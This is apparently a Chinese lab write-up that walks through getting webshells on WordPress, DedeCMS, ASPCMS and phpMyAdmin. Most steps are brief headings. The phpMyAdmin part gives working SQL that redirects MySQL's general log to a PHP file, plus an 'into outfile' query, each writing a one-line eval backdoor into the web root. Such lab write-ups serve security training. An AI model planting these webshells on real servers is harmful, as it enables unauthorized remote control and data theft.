常见CMS漏洞(wordpress,DedeCms,ASPCMS,PHPMyAdmin)

练习一:wordpress漏洞测试

1.上传包含木马的主题

安装网站

登陆网站 上传主题处测试漏洞注入

在上传主题模板压缩包中写入一句话木马

网站上传含有木马的zip压缩包

上传成功

wordpress主题目录 wp-content/themes 访问上传木马测试

2.修改主题的配置文件为含有木马的文件

练习2:DedeCMS-V5.7.82-UTF8 漏洞测试

安装网站
登录后台管理网站
1.通过文件管理器上传webshell
2.修改模板文件拿webshell

浏览主页 内容为所写入的phpinfo

3.后台任意命令执行拿webshell

查看添加广告路径

找到路径

进行木马连接

4.通过后台sql命令执行拿webshell

查看文件属性 发现是刚才写入的文件

进行木马连接

练习3:ASPCMS漏洞测试

登录网站后台

再访问网站后台

抓包

抓包修改 写入一句话木马 放行 页面修改成功

配置文件中写入了一句话木马

木马连接

练习4:PHPMyAdmin漏洞测试

网站根目录下更新了目录

访问网站 数据库账户密码 登录

1.界面图形化getshell
2.通过日志文件getshell
复制代码
show global variables like '%general%';

查看 状态 (同样也可以在这里进行命令也可以修改日志位置)

复制代码
set global general_log='on';
set global general_log_file = 'D:/phpstudy_pro/WWW/111.php'

写入一句话木马

复制代码
select '<?php eval($_POST[cmd]);?>';

查看写入位置有写入文件

木马连接

3.导入导出getshell

先判断mysql位置

猜测网站路径D:/phpstudy_pro/www

写入木马文件

复制代码
select "<?php eval($_POST[a]);?>" into outfile 'D:/phpstudy_pro/WWW/aaa.php';

进行木马连接

相关推荐
Johny_Zhao12 小时前
FreeRADIUS + 华为AC/AP + 802.1X/WPA2-Enterprise 无线认证对接部署完整指南
网络·网络安全·信息安全·ldap·radius·huawei·系统运维·centos8
运行时异常12 小时前
【WMS 仓储系统集成 AI Agent 实战】第 8 讲(终篇):生产部署与并发安全——Semaphore 放进 Flux.defer 的坑,压测抓了一晚上
人工智能·安全
虹科网络安全12 小时前
“顶会”看安全(十八):超越越狱:揭示由能力边界模糊引发的 LLM 应用安全风险
人工智能·安全
hasty12 小时前
OAuth 登录成功,不代表邮箱可信:Flarum 账号关联漏洞的安全编码启示
安全
国科安芯14 小时前
断电也隔离、听得真:ASL3159S 单通道 SPDT 模拟开关的“断电保护 + 音频保真“账
单片机·嵌入式硬件·安全·商业航天·抗辐射
hasty14 小时前
2026软件供应链安全政策全景
安全·安全威胁分析·代码复审
小程序设计14 小时前
基于STM32的智慧厨房多参数安全监测与预警系统设计
stm32·嵌入式硬件·安全
锐速网络15 小时前
轻量化安全建设指南:无需硬件的SaaS化勒索病毒防御方案
网络安全·云备份·主机安全·saas安全·勒索病毒防护·轻量化安全·中小企业安全
绿蕉15 小时前
从“叠积木补安全“到“设计即安全“:EE 架构里的安全左移革命
安全·架构
Frag0ut16 小时前
Chrome与Chromium内核浏览器在Windows 11上的新特性全景解析
前端·chrome·windows·web安全·chromium·gemini ai·playready drm